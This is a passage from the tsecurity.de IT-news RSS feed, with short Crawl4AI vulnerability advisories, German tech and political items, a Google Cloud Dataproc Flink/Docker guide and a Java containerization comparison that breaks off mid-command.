<link>https://tsecurity.de/de/3663473/sicherheitsluecken/cve-2026-56259-crawl4ai-up-to-087-docker-api-llmjob-baseurlapitoken-redirect-euvd-2026-43226/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3663473/sicherheitsluecken/cve-2026-56259-crawl4ai-up-to-087-docker-api-llmjob-baseurlapitoken-redirect-euvd-2026-43226/</guid>
<pubDate>Sun, 12 Jul 2026 17:08:54 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability classified as <a href="https://vuldb.com/kb/risk">problematic</a> was found in <a href="https://vuldb.com/product/crawl4ai">Crawl4AI up to 0.8.7</a>. Affected is an unknown function of the file <em>/llm/job</em> of the component <em>Docker API</em>. Executing a manipulation of the argument <em>base_url/api_token</em> can lead to open redirect.

This vulnerability is registered as <a href="https://vuldb.com/cve/CVE-2026-56259">CVE-2026-56259</a>. It is possible to launch the attack remotely. No exploit is available.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-56260 | Crawl4AI up to 0.8.6 Docker API output_path denial of service (EUVD-2026-43227)]]></title>
<description><![CDATA[A vulnerability, which was classified as critical, has been found in Crawl4AI up to 0.8.6. Affected by this vulnerability is an unknown functionality of the component Docker API. The manipulation of the argument output_path leads to denial of service.

This vulnerability is documented as CVE-2026...]]></description>
<link>https://tsecurity.de/de/3663392/sicherheitsluecken/cve-2026-56260-crawl4ai-up-to-086-docker-api-outputpath-denial-of-service-euvd-2026-43227/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3663392/sicherheitsluecken/cve-2026-56260-crawl4ai-up-to-086-docker-api-outputpath-denial-of-service-euvd-2026-43227/</guid>
<pubDate>Sun, 12 Jul 2026 16:09:18 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability, which was classified as <a href="https://vuldb.com/kb/risk">critical</a>, has been found in <a href="https://vuldb.com/product/crawl4ai">Crawl4AI up to 0.8.6</a>. Affected by this vulnerability is an unknown functionality of the component <em>Docker API</em>. The manipulation of the argument <em>output_path</em> leads to denial of service.

This vulnerability is documented as <a href="https://vuldb.com/cve/CVE-2026-56260">CVE-2026-56260</a>. The attack can be initiated remotely. There is not any exploit available.]]></content:encoded>
</item>
<item>
<title><![CDATA[Zattoo im Test: Der einstige Live-TV-Platzhirsch schwächelt - aber nur langsam]]></title>
<description><![CDATA[Zattoo bietet über 240 TV-Sender, je nach Abo auch viele davon in HD oder sogar Full HD. Unser Test zeigt eine hervorragende Streaming-Qualität, der Live-TV-Anbieter patzt jedoch bei einer Funktion.
																					Dieser Artikel wurde einsortiert unter 
																	Kaufberatung,							...]]></description>
<link>https://tsecurity.de/de/3663278/it-nachrichten/zattoo-im-test-der-einstige-live-tv-platzhirsch-schwaechelt-aber-nur-langsam/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3663278/it-nachrichten/zattoo-im-test-der-einstige-live-tv-platzhirsch-schwaechelt-aber-nur-langsam/</guid>
<pubDate>Sun, 12 Jul 2026 14:34:20 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Zattoo bietet über 240 TV-Sender, je nach Abo auch viele davon in HD oder sogar Full HD. Unser Test zeigt eine hervorragende Streaming-Qualität, der Live-TV-Anbieter patzt jedoch bei einer Funktion.
																					Dieser Artikel wurde einsortiert unter 
																	<a href="https://www.netzwelt.de/testberichte/index.html">Kaufberatung</a>,																	<a href="https://www.netzwelt.de/download/8900-android-kostenlos.html">Android</a>,																	<a href="https://www.netzwelt.de/hersteller/apple.html">Apple</a>,																	<a href="https://www.netzwelt.de/apple-ipad/testbericht.html">Apple iPad</a>,																	<a href="https://www.netzwelt.de/tablet-pc/index.html">Tablet</a>,																	<a href="https://www.netzwelt.de/live-tv-anbieter/zattoo-index.html">Zattoo</a>,																	<a href="https://www.netzwelt.de/video/index.html">Live-Streams</a>,																	<a href="https://www.netzwelt.de/live-tv-anbieter/">Internet-Fernsehen</a>,																	<a href="https://www.netzwelt.de/live-tv-anbieter/">Fernsehen über das Internet: Live-TV online schauen mit TV-Streaming-Apps</a>,																	<a href="https://www.netzwelt.de/live-tv-anbieter/vergleich/kostenlose-tv-apps-besten-apps-s-fernsehen-handy.html">Kostenloses TV-Streaming: Die besten Apps für Live-TV - gratis und legal</a>.]]></content:encoded>
</item>
<item>
<title><![CDATA[🛑 Warum die politische Elite die Kontrolldaten der Bürger sperrt (Informationsfreiheitsgesetz, IFG)💶]]></title>
<description><![CDATA[Author: VAZULES Analysiert - Bewertung: 0x - Views:2 *▶️ DEMOKRATISCHE STRUKTURANALYSE:* Wie viel dürfen wir als Gesellschaft wissen, wenn der Staat mit unseren Steuergeldern hantiert? Genau jetzt steht das fast 20 Jahre alte Informationsfreiheitsgesetz (IFG) auf dem Schafott der Politik. Wir dek...]]></description>
<link>https://tsecurity.de/de/3663259/it-security-nachrichten/warum-die-politische-elite-die-kontrolldaten-der-buerger-sperrt-informationsfreiheitsgesetz-ifg/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3663259/it-security-nachrichten/warum-die-politische-elite-die-kontrolldaten-der-buerger-sperrt-informationsfreiheitsgesetz-ifg/</guid>
<pubDate>Sun, 12 Jul 2026 14:22:04 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: VAZULES Analysiert - Bewertung: 0x - Views:2 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/svXWRPpwPKc?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>*▶️ DEMOKRATISCHE STRUKTURANALYSE:* Wie viel dürfen wir als Gesellschaft wissen, wenn der Staat mit unseren Steuergeldern hantiert? Genau jetzt steht das fast 20 Jahre alte Informationsfreiheitsgesetz (IFG) auf dem Schafott der Politik. Wir dekonstruieren diesen schwersten Angriff auf die staatliche Transparenz in der Geschichte der Bundesrepublik.<br />
<br />
Wir entlarven das Herrschaftswissen: Ohne das IFG (Informationsfreiheitsgesetz) wären Skandale wie die Maskenaffäre oder die gescheiterte PKW-Maut nie ans Licht gekommen. Doch die konservative Union will den Zugang massiv einschränken: NGOs (Greenpeace) und investigativen Medien soll der Zugang verwehrt werden. Das offizielle Argument? "Bürokratieabbau" wegen massivem Personalmangel (15% Abbau bis 2029).<br />
<br />
Die Analyse zeigt: Das ist eine vorgeschobene Ausrede, um unbequeme Ministerien abzusichern. Der Staat fungiert als absoluter Schleusenwärter (Gatekeeper). Die echte, digitale Lösung, die 2021 im Koalitionsvertrag versprochen, aber nie geliefert wurde: Das Transparenzgesetz ("Open by Default"). Verträge, Subventionen und Gutachten über 100.000 € müssen automatisch, digital und kostenlos hochgeladen werden – wie ein öffentliches Änderungsprotokoll für staatliches Handeln. <br />
<br />
Wir hängen fest in der Tradition des Kaiserreichs, wo Daten als Herrschaftswissen und nicht als Gemeingut betrachtet werden. Transparenz ist kein Luxus – sie ist das Fehlerprotokoll (Bugtracker) unserer Demokratie! ✊<br />
<br />
---Thema:<br />
*🛑 Der Black Box Staat: Warum die Elite die Kontrolldaten der Bürger sperrt 💶*<br />
<br />
*Kernaussage:*<br />
<br />
* *📉 Die Bedrohung des IFG:* Zivilgesellschaftliche Gruppen warnen vor dem schwersten Angriff auf die staatliche Transparenz. Die Pläne der Union beschränken Auskünfte auf Personen mit "berechtigtem Interesse", was Journalisten und NGOs systematisch aussperrt.<br />
<br />
* *🧠 Das Gatekeeper-System:* Schon das aktuelle IFG ist ein mühsames System (wie eine kostenpflichtige Support-Anfrage). Ministerien nutzen diese Verzögerungstaktik, um sich vor Skandalen abzuschirmen.<br />
<br />
* *⚖️ Die Bürokratie-Ausrede:* Die CDU/CSU begründet die Einschränkung mit extremen Verwaltungskosten und Personalmangel. Die Bundesbeauftragte für Informationsfreiheit kontert: Transparenz ist das Fundament eines Rechtsstaats, kein Luxusfeature.<br />
<br />
* *🌍 Die digitale Lösung (Open by Default):* Statt teurer Einzelanträge fordert die Zivilgesellschaft ein proaktives Transparenzgesetz. Daten aus Sachsen beweisen: Werden Dokumente (Gutachten, Verträge) automatisch digital veröffentlicht, SINKT der tatsächliche Bearbeitungsaufwand der Behörden massiv.<br />
<br />
* *🛡️ Herrschaftswissen vs. Gemeingut:* Die Weigerung des Staates offenbart ein autoritäres Staatsverständnis (Tradition des Obrigkeitsstaates). Daten werden nicht als Eigentum der Bürger, sondern als Werkzeug der Macht betrachtet.<br />
<br />
*1. ⚙️ VERTEIDIGE DAS FEHLERPROTOKOLL DER DEMOKRATIE:*<br />
    KANAL ABONNIEREN: @vazules <br />
<br />
#Transparenz #Politik #Demokratie #Systemkritik #Digitalisierung #Lobbyismus #Gerechtigkeit #LaKanDoR #informationsfreiheit #opendata #IFG #Informationsfreiheitsgesetz<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Video: VPN im Urlaub – Abo kaufen oder kostenlos selbst bauen?]]></title>
<description><![CDATA[Statt teurer VPN-Anbieter reicht im Urlaub die eigene Fritzbox. Wir zeigen, wie ihr in wenigen Minuten einen sicheren WireGuard-Tunnel nach Hause einrichtet.]]></description>
<link>https://tsecurity.de/de/3662970/it-nachrichten/video-vpn-im-urlaub-abo-kaufen-oder-kostenlos-selbst-bauen/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3662970/it-nachrichten/video-vpn-im-urlaub-abo-kaufen-oder-kostenlos-selbst-bauen/</guid>
<pubDate>Sun, 12 Jul 2026 10:18:01 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Statt teurer VPN-Anbieter reicht im Urlaub die eigene Fritzbox. Wir zeigen, wie ihr in wenigen Minuten einen sicheren WireGuard-Tunnel nach Hause einrichtet.]]></content:encoded>
</item>
<item>
<title><![CDATA[Nvidia bringt neue Karten auf den Markt, die sich jeder leisten kann]]></title>
<description><![CDATA[Nvidia hat die „GeForce Trading Cards: Series 1“ vorgestellt, eine kostenlose Serie von “Sammelkarten”, die die Geschichte des Unternehmens im Bereich PC-Gaming würdigt. Die Serie umfasst 14 verschiedene Karten mit Motiven historischer Grafikkarten, klassischer Technik-Demos und bekannter Spiele,...]]></description>
<link>https://tsecurity.de/de/3662923/it-nachrichten/nvidia-bringt-neue-karten-auf-den-markt-die-sich-jeder-leisten-kann/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3662923/it-nachrichten/nvidia-bringt-neue-karten-auf-den-markt-die-sich-jeder-leisten-kann/</guid>
<pubDate>Sun, 12 Jul 2026 09:17:45 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Nvidia hat die „<a href="https://www.nvidia.com/en-us/geforce/news/geforce-trading-cards-series-1-summer-of-rtx-giveaways/">GeForce Trading Cards: Series 1</a>“ vorgestellt, eine kostenlose Serie von “Sammelkarten”, die die Geschichte des Unternehmens im Bereich PC-Gaming würdigt. Die Serie umfasst 14 verschiedene Karten mit Motiven historischer Grafikkarten, klassischer Technik-Demos und bekannter Spiele, die die Marke GeForce im Laufe der Jahre geprägt haben.</p>



<p>Zu den Karten gehören unter anderem die NV1 aus dem Jahr 1995, die GeForce 256 sowie die GeForce 3, die GeForce 7800 GTX und die GeForce GTX 1080. Die Serie umfasst zudem Karten, die von Technik-Demos wie „Bubble“, „Chameleon“ und „Medusa“ sowie von Spielen wie „Unreal Tournament 2004“ und „Borderlands“ inspiriert sind.</p>



<p>Die Sammlerkarten werden im Rahmen der „Summer of RTX“-Kampagne von Nvidia kostenlos über die sozialen Medien des Unternehmens sowie auf Spielemessen und Veranstaltungen wie der Gamescom 2026 verteilt. Es handelt sich dabei also nicht um echte benutzbare Sammelkarten.</p>



<p>Laut Nvidia soll damit die Aufmerksamkeit auf Grafikkarten und Spiele gelenkt werden, die Generationen von PC-Spielern geprägt haben. Ein zusätzlicher Vorteil ist, dass die „GeForce Trading Cards: Series 1“ – obwohl die Speicherkrise die Preise für alle möglichen Grafikkarten in die Höhe getrieben hat – tatsächlich Nvidia-Karten sind, die sich jeder leisten kann. Zumindest solange, bis sie auf dem Gebrauchtmarkt auftauchen.</p>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper">

</div></figure>



<p><a href="https://www.pcwelt.de/article/3028440/nvidia-rtx-6000-release-2027-specs-geruechte-rubin.html" target="_blank" rel="noreferrer noopener"> Nvidia RTX-6000-Serie soll erst Ende 2027 erscheinen</a></p>



<p></p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[New Dataproc optional components support Apache Flink and Docker]]></title>
<description><![CDATA[Google Cloud’s Dataproc lets you run native Apache Spark and Hadoop clusters on Google Cloud in a simpler, more cost-effective way. In this blog, we will talk about our newest optional components available in Dataproc’s Component Exchange: Docker and Apache Flink.Docker container on DataprocDocke...]]></description>
<link>https://tsecurity.de/de/3662840/it-security-nachrichten/new-dataproc-optional-components-support-apache-flink-and-docker/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3662840/it-security-nachrichten/new-dataproc-optional-components-support-apache-flink-and-docker/</guid>
<pubDate>Sun, 12 Jul 2026 08:07:02 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="block-paragraph"><p>Google Cloud’s Dataproc lets you run native Apache Spark and Hadoop clusters on Google Cloud in a simpler, more cost-effective way. In this blog, we will talk about our newest optional components available in Dataproc’s Component Exchange: Docker and Apache Flink.</p><h3>Docker container on Dataproc</h3><p>Docker is a widely used container technology. Since it’s now a Dataproc optional component, Docker daemons can now be installed on every node of the Dataproc cluster. This will give you the ability to install containerized applications and interact with Hadoop clusters easily on the cluster. </p><p>In addition, Docker is also critical to supporting these features:</p><ol><li><p>Running containers with YARN</p></li><li><p>Portable Apache Beam job</p></li></ol><p>Running containers on YARN allows you to manage dependencies of your YARN application separately, and also allows you to create containerized services on YARN. <a href="https://hadoop.apache.org/docs/current/hadoop-yarn/hadoop-yarn-site/DockerContainers.html" target="_blank">Get more details here.</a> Portable Apache Beam packages jobs into Docker containers and submits them the Flink cluster. Find <a href="https://beam.apache.org/roadmap/portability/" target="_blank">more detail about Beam portability</a>. </p><p>Docker optional component is also configured to use <a href="https://cloud.google.com/container-registry">Google Container Registry</a>, in addition to the default Docker registry. This lets you use container images managed by your organization.</p><p>Here is how to create a Dataproc cluster with the Docker optional component:</p><p><code>gcloud beta dataproc clusters create &lt;cluster-name&gt; \</code><br><code>  --optional-components=DOCKER \</code><br><code>  --image-version=1.5</code></p><p>When you run the Docker application, the log will be streamed to Cloud Logging, using gcplogs driver.</p><p>If your application does not depend on any Hadoop services, check out <a href="https://kubernetes.io/" target="_blank">Kubernetes</a> and <a href="https://cloud.google.com/kubernetes-engine/docs/quickstart">Google Kubernetes Engine</a> to run containers natively. For more on using Dataproc, <a href="https://cloud.google.com/dataproc/docs">check out our documentation</a>.</p><h3>Apache Flink on Dataproc</h3><p>Among streaming analytics technologies, Apache Beam and Apache Flink stand out. Apache Flink is a distributed processing engine using stateful computation. <a href="https://beam.apache.org/get-started/beam-overview/" target="_blank">Apache Beam</a> is a unified model for defining batch and steaming processing pipelines. Using <a href="https://beam.apache.org/documentation/runners/flink/" target="_blank">Apache Flink as an execution engine</a>, you can also run Apache Beam jobs on Dataproc, in addition to Google’s Cloud Dataflow service.</p><p>Flink and running Beam on Flink are suitable for large-scale, continuous jobs, and provide:</p><ul><li><p>A streaming-first runtime that supports both batch processing and data streaming programs</p></li><li><p>A runtime that supports very high throughput and low event latency at the same time</p></li><li><p>Fault-tolerance with exactly-once processing guarantees</p></li><li><p>Natural back-pressure in streaming programs</p></li><li><p>Custom memory management for efficient and robust switching between in-memory and out-of-core data processing algorithms</p></li><li><p>Integration with YARN and other components of the Apache Hadoop ecosystem</p></li></ul><p>Our Dataproc team here at Google Cloud recently announced that <a href="https://cloud.google.com/blog/products/data-analytics/open-source-processing-engines-for-kubernetes">Flink Operator on Kubernetes</a> is now available. It allows you to run Apache Flink jobs in Kubernetes, bringing the benefits of reducing platform dependency and producing better hardware efficiency. </p><p><b>Basic Flink Concepts</b></p><p>A Flink cluster consists of a Flink JobManager and a set of Flink TaskManagers. Like similar roles in other distributed systems such as YARN, JobManager has responsibilities such as accepting jobs, managing resources and supervising jobs. TaskManagers are responsible for running the actual tasks. </p><p>When running Flink on Dataproc, we use YARN as resource manager for Flink. You can run Flink jobs in 2 ways: job cluster and session cluster. For the job cluster, YARN will create JobManager and TaskManagers for the job and will destroy the cluster once the job is finished. For session clusters, YARN will create JobManager and a few TaskManagers.The cluster can serve multiple jobs until being shut down by the user.</p><p><b>How to create a cluster with Flink</b></p><p>Use this command to get started:</p><p><code>gcloud beta dataproc clusters create &lt;cluster-name&gt; \</code><br><code>  --optional-components=FLINK \</code><br><code>  --image-version=1.5</code></p><p><b>How to run a Flink job</b></p><p>After a Dataproc cluster with Flink starts, you can submit your Flink jobs to YARN directly using the Flink job cluster. After accepting the job, Flink will start a JobManager and slots for this job in YARN. The Flink job will be run in the YARN cluster until finished. The JobManager created will then be shut down. Job logs will be available in regular YARN logs. Try this command to run a word-counting example:</p></div>
<div class="block-code"><dl>
    <dt>code_block</dt>
    <dd>&lt;ListValue: [StructValue([('code', 'HADOOP_CLASSPATH=`hadoop classpath` flink run -m yarn-cluster /usr/lib/flink/examples/batch/WordCount.jar'), ('language', ''), ('caption', &lt;wagtail.rich_text.RichText object at 0x7f58aa8374c0&gt;)])]&gt;</dd>
</dl></div>
<div class="block-paragraph"><p>The Dataproc cluster will not start a <a href="https://ci.apache.org/projects/flink/flink-docs-release-1.10/ops/deployment/yarn_setup.html#flink-yarn-session" target="_blank">Flink Session</a> cluster by default. Instead, Dataproc will create the script “/usr/bin/flink-yarn-daemon,” which will start a Flink session. </p><p>If you want to start a Flink session when Dataproc is created, use the metadata key to allow it:</p></div>
<div class="block-code"><dl>
    <dt>code_block</dt>
    <dd>&lt;ListValue: [StructValue([('code', 'gcloud dataproc clusters create &lt;cluster-name&gt; \\\r\n    --optional-components=FLINK \\ \r\n    --image-version=1.5 \\\r\n    --metadata flink-start-yarn-session=true'), ('language', ''), ('caption', &lt;wagtail.rich_text.RichText object at 0x7f58aa837580&gt;)])]&gt;</dd>
</dl></div>
<div class="block-paragraph"><p>If you want to start the Flink session after Dataproc is created, you can run the following command on master node:</p></div>
<div class="block-code"><dl>
    <dt>code_block</dt>
    <dd>&lt;ListValue: [StructValue([('code', '$ . /usr/bin/flink-yarn-daemon'), ('language', ''), ('caption', &lt;wagtail.rich_text.RichText object at 0x7f58aa8375e0&gt;)])]&gt;</dd>
</dl></div>
<div class="block-paragraph"><p>Submit jobs to that session cluster. You’ll need to get the Flink JobManager URL:</p></div>
<div class="block-code"><dl>
    <dt>code_block</dt>
    <dd>&lt;ListValue: [StructValue([('code', 'HADOOP_CLASSPATH=`hadoop classpath` flink run -m &lt;JOB_MANAGER_HOSTNAME&gt;:&lt;REST_API_PORT&gt; /usr/lib/flink/examples/batch/WordCount.jar'), ('language', ''), ('caption', &lt;wagtail.rich_text.RichText object at 0x7f58aa837640&gt;)])]&gt;</dd>
</dl></div>
<div class="block-paragraph"><p><b>How to run a Java Beam job</b></p><p>It is very easy to run an Apache Beam job written in Java. There is no extra configuration needed. As long as you package your Beam jobs into a JAR file, you do not need to configure anything to run Beam on Flink. This is the command you can use:</p></div>
<div class="block-code"><dl>
    <dt>code_block</dt>
    <dd>&lt;ListValue: [StructValue([('code', '$ mvn package -Pflink-runner\r\n$ bin/flink run -c org.apache.beam.examples.WordCount /path/to/your.jar\r\n--runner=FlinkRunner --other-parameters'), ('language', ''), ('caption', &lt;wagtail.rich_text.RichText object at 0x7f58aa8376a0&gt;)])]&gt;</dd>
</dl></div>
<div class="block-paragraph"><p><b>How to run a Python Beam job written in Python</b></p><p>Beam jobs written in Python use a different execution model. To run them in Flink on Dataproc, you will also need to enable the Docker optional component. Here’s how to create a cluster:</p></div>
<div class="block-code"><dl>
    <dt>code_block</dt>
    <dd>&lt;ListValue: [StructValue([('code', 'gcloud dataproc clusters create &lt;cluster-name&gt; \\\r\n    --optional-components=FLINK,DOCKER'), ('language', ''), ('caption', &lt;wagtail.rich_text.RichText object at 0x7f58aa837700&gt;)])]&gt;</dd>
</dl></div>
<div class="block-paragraph"><p>You will also need to install necessary Python libraries needed by Beam, such as apache_beam and apache_beam[gcp]. You can pass in a Flink master URL to let it run in a session cluster. If you leave the URL out, you need to use the job cluster mode to run this job:</p></div>
<div class="block-code"><dl>
    <dt>code_block</dt>
    <dd>&lt;ListValue: [StructValue([('code', 'import apache_beam as beam\r\nfrom apache_beam.options.pipeline_options import PipelineOptions\r\n\r\noptions = PipelineOptions([\r\n    "--runner=FlinkRunner",\r\n    "--flink_version=1.9",\r\n    "--flink_master=localhost:8081",\r\n    "--environment_type=DOCKER"\r\n])\r\nwith beam.Pipeline(options=options) as p:\r\n    ...'), ('language', ''), ('caption', &lt;wagtail.rich_text.RichText object at 0x7f58aa837760&gt;)])]&gt;</dd>
</dl></div>
<div class="block-paragraph"><p>After you’ve written your Python job, simply run it to submit:</p></div>
<div class="block-code"><dl>
    <dt>code_block</dt>
    <dd>&lt;ListValue: [StructValue([('code', '$ python wordcount.py'), ('language', ''), ('caption', &lt;wagtail.rich_text.RichText object at 0x7f58aa8377c0&gt;)])]&gt;</dd>
</dl></div>
<div class="block-paragraph"><p><a href="https://cloud.google.com/dataproc">Learn more about Dataproc.</a></p></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Buildpacks vs Jib vs Dockerfile: Comparing containerization methods]]></title>
<description><![CDATA[As developers we work on source code, but production systems don't run source, they need a runnable thing. Starting many years ago, most enterprises were using Java EE (aka J2EE) and the runnable "thing" we would deploy to production was a ".jar", ".war", or ".ear" file. Those files consisted of ...]]></description>
<link>https://tsecurity.de/de/3662836/it-security-nachrichten/buildpacks-vs-jib-vs-dockerfile-comparing-containerization-methods/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3662836/it-security-nachrichten/buildpacks-vs-jib-vs-dockerfile-comparing-containerization-methods/</guid>
<pubDate>Sun, 12 Jul 2026 08:06:57 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="block-paragraph"><p>As developers we work on source code, but production systems don't run source, they need a runnable thing. Starting many years ago, most enterprises were using Java EE (aka J2EE) and the runnable "thing" we would deploy to production was a ".jar", ".war", or ".ear" file. Those files consisted of the compiled Java classes and would run inside of a "container" running on the JVM. As long as your class files were compatible with the JVM and container, the app would just work.</p><p>That all worked great until people started building non-JVM stuff: Ruby, Python, NodeJS, Go, etc. Now we needed another way to package up apps so they could be run on production systems. To do this we needed some kind of virtualization layer that would allow anything to be run. Heroku was one of the first to tackle this and they used a Linux virtualization system called "lxc" - short for Linux Containers. Running a "container" on lxc was half of the puzzle because still a "container" needed to be created from source code, so Heroku invented what they called "Buildpacks" to create a standard way to convert source into a container.</p><p>A bit later a Heroku competitor named dotCloud was trying to tackle similar problems and went a different route which ultimately led to Docker, a standard way to create and run containers across platforms including Windows, Mac, Linux, Kubernetes, and Google Cloud Run. Ultimately the container specification behind Docker became a standard under the <a href="https://opencontainers.org/" target="_blank">Open Container Initiative (OCI)</a> and the virtualization layer switched from lxc to <a href="https://github.com/opencontainers/runc" target="_blank">runc</a> (also an OCI project).</p><p>The traditional way to build a Docker container is built into the <code>docker</code> tool and uses a sequence of special instructions usually in a file named <code>Dockerfile</code> to compile the source code and assemble the "layers" of a container image.</p><p>Yeah, this is confusing because we have all sorts of different "containers" and ways to run stuff in those containers. And there are also many ways to create the things that run in containers. The bit of history is important because it helps us categorize all of this into three parts:</p><ul><li>Container Builders - Turn source code into a Container Image</li><li>Container Images - Archive files containing a "runnable" application</li><li>Containers - Run Container Images</li></ul><p>With Java EE those three categories map to technologies like:</p><ul><li>Container Builders == Ant or Maven</li><li>Container Images == .jar, .war, or .ear</li><li>Containers == JBoss, WebSphere, WebLogic</li></ul><p>With Docker / OCI those three categories map to technologies like:</p><ul><li>Container Builders == Dockerfile, Buildpacks, or Jib</li><li>Container Images == .tar files usually not dealt with directly but through a "container registry"</li><li>Containers == Docker, Kubernetes, Cloud Run</li></ul><h3>Java Sample Application</h3>Let's explore the Container Builder options further on a little Java server application.  If you want to follow along, clone my <a href="https://github.com/jamesward/comparing-docker-methods" target="_blank">comparing-docker-methods project</a>:<p><code>git clone https://github.com/jamesward/comparing-docker-methods.git</code><br></p><p><code>cd comparing-docker-methods</code></p><p></p><p>In that project you'll see a basic Java web server in <code>src/main/java/com/google/WebApp.java</code> that just responds with "hello, world" on a GET request to <code>/</code>. Here is the source:<br></p><p></p></div>
<div class="block-code"><dl>
    <dt>code_block</dt>
    <dd>&lt;ListValue: [StructValue([('code', 'package com.google;\r\n\r\nimport com.sun.net.httpserver.HttpServer;\r\nimport java.io.IOException;\r\nimport java.io.OutputStream;\r\nimport java.net.InetSocketAddress;\r\n\r\npublic class WebApp {\r\n\r\n  public static void main(String[] args) throws IOException {\r\n    int port = Integer.parseInt(System.getenv().getOrDefault("PORT", "8080"));\r\n    HttpServer server = HttpServer.create(new InetSocketAddress(port), 0);\r\n\r\n    server.createContext("/", handler -&gt; {\r\n      byte[] response = "hello, world".getBytes();\r\n      handler.sendResponseHeaders(200, response.length);\r\n      try (OutputStream os = handler.getResponseBody()) {\r\n        os.write(response);\r\n      }\r\n    });\r\n\r\n    System.out.println("Listening at http://localhost:" + port);\r\n\r\n    server.start();\r\n  }\r\n}'), ('language', ''), ('caption', &lt;wagtail.rich_text.RichText object at 0x7f58aa860670&gt;)])]&gt;</dd>
</dl></div>
<div class="block-paragraph"><p>This project uses Maven with a minimal <code>pom.xml</code> build config file for compiling and running the Java server:</p></div>
<div class="block-code"><dl>
    <dt>code_block</dt>
    <dd>&lt;ListValue: [StructValue([('code', '&lt;?xml version="1.0" encoding="UTF-8"?&gt;\r\n&lt;project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"\r\n    xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd"&gt;\r\n  &lt;modelVersion&gt;4.0.0&lt;/modelVersion&gt;\r\n\r\n  &lt;groupId&gt;com.google&lt;/groupId&gt;\r\n  &lt;artifactId&gt;sample-java-mvn&lt;/artifactId&gt;\r\n  &lt;packaging&gt;jar&lt;/packaging&gt;\r\n  &lt;version&gt;0.1.0-SNAPSHOT&lt;/version&gt;\r\n\r\n  &lt;properties&gt;\r\n    &lt;maven.compiler.source&gt;8&lt;/maven.compiler.source&gt;\r\n    &lt;maven.compiler.target&gt;8&lt;/maven.compiler.target&gt;\r\n  &lt;/properties&gt;\r\n\r\n  &lt;build&gt;\r\n    &lt;plugins&gt;\r\n      &lt;plugin&gt;\r\n        &lt;groupId&gt;org.codehaus.mojo&lt;/groupId&gt;\r\n        &lt;artifactId&gt;exec-maven-plugin&lt;/artifactId&gt;\r\n        &lt;version&gt;1.6.0&lt;/version&gt;\r\n        &lt;executions&gt;\r\n          &lt;execution&gt;\r\n            &lt;goals&gt;\r\n              &lt;goal&gt;java&lt;/goal&gt;\r\n            &lt;/goals&gt;\r\n          &lt;/execution&gt;\r\n        &lt;/executions&gt;\r\n        &lt;configuration&gt;\r\n          &lt;mainClass&gt;com.google.WebApp&lt;/mainClass&gt;\r\n        &lt;/configuration&gt;\r\n      &lt;/plugin&gt;\r\n\r\n      &lt;plugin&gt;\r\n        &lt;groupId&gt;org.apache.maven.plugins&lt;/groupId&gt;\r\n        &lt;artifactId&gt;maven-jar-plugin&lt;/artifactId&gt;\r\n        &lt;version&gt;3.2.0&lt;/version&gt;\r\n        &lt;configuration&gt;\r\n          &lt;archive&gt;\r\n            &lt;manifest&gt;\r\n              &lt;mainClass&gt;com.google.WebApp&lt;/mainClass&gt;\r\n            &lt;/manifest&gt;\r\n          &lt;/archive&gt;\r\n        &lt;/configuration&gt;\r\n      &lt;/plugin&gt;\r\n    &lt;/plugins&gt;\r\n  &lt;/build&gt;\r\n\r\n&lt;/project&gt;'), ('language', ''), ('caption', &lt;wagtail.rich_text.RichText object at 0x7f58aa860c10&gt;)])]&gt;</dd>
</dl></div>
<div class="block-paragraph"><p>If you want to run this locally make sure you have Java 8 installed and from the project root directory, run:</p><p><code>./mvnw compile exec:java</code></p><p>You can test the server by visiting: <a href="http://localhost:8080/" target="_blank">http://localhost:8080</a></p><h3>Container Builder: Buildpacks</h3><p>We have an application that we can run locally so let's get back to those Container Builders. Earlier you learned that Heroku invented Buildpacks to create standard, polyglot ways to go from source to a Container Image. When Docker / OCI Containers started gaining popularity Heroku and Pivotal worked together to make their Buildpacks work with Docker / OCI Containers. That work is now a sandbox Cloud Native Computing Foundation project: <a href="https://buildpacks.io/" target="_blank">https://buildpacks.io/</a></p><p>To use Buildpacks you will need to <a href="https://docs.docker.com/get-started/" target="_blank">install Docker</a> and <a href="https://github.com/buildpacks/pack/releases" target="_blank">the pack tool</a>. Now from the command line tell Buildpacks to take your source and turn it into a Container Image:</p><p><code>pack build --builder=gcr.io/buildpacks/builder:v1 